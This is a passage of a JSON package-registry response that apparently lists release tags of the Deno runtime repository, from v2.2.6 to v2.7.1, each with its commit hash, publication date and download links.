ithub.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependenci